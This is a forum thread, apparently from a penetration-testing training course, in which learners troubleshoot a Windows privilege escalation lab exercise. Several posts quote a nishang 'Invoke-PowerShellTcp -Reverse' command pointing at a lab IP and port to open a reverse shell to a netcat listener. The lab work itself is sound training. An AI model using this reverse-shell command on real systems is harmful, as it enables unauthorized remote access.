If anyone has done the Windows Privilege Escalation module:
I'm on the “Attacking the OS” “Vulnerable Services” section and could use some help.
This section shouldn’t be too hard as you are supposed to just copy the example that the lesson gives you.
But after seemingly following the example to the letter, the exploit is not working. I am not getting the netcat shell.
The only thing I can think of right now is that I may not be appending the
<Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443>
correctly to the shell.ps1 script. I've tried pasting this in many different places in the script, of course replacing the IP with my attack box IP address. I never get the netcat shell.
OK, for some reason my own Parrot virtual machine was unable to get the netcat shell listener.
Using the pwn box I was able to get the shell. Possibly some network or firewall setting on my own setup may have prevented it.
OK, I noticed on that bottom terminal it says listening on 0.0.0.0. Looks odd. Should be listening on the tun0 IP address of your attack machine.
It was not a clear section.
I managed to get a reverse shell by appending “Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.172 -Port 9443” to nishang/Shells/Invoke-PowerShellTcp.ps1 at master · samratashok/nishang · GitHub.
However, there was no privilege escalation with this shell (I stayed as user htb-student).
I got the flag using this link Windows Privilege Escalation. This room covers fundamental techniques… | by YCZHU | Medium.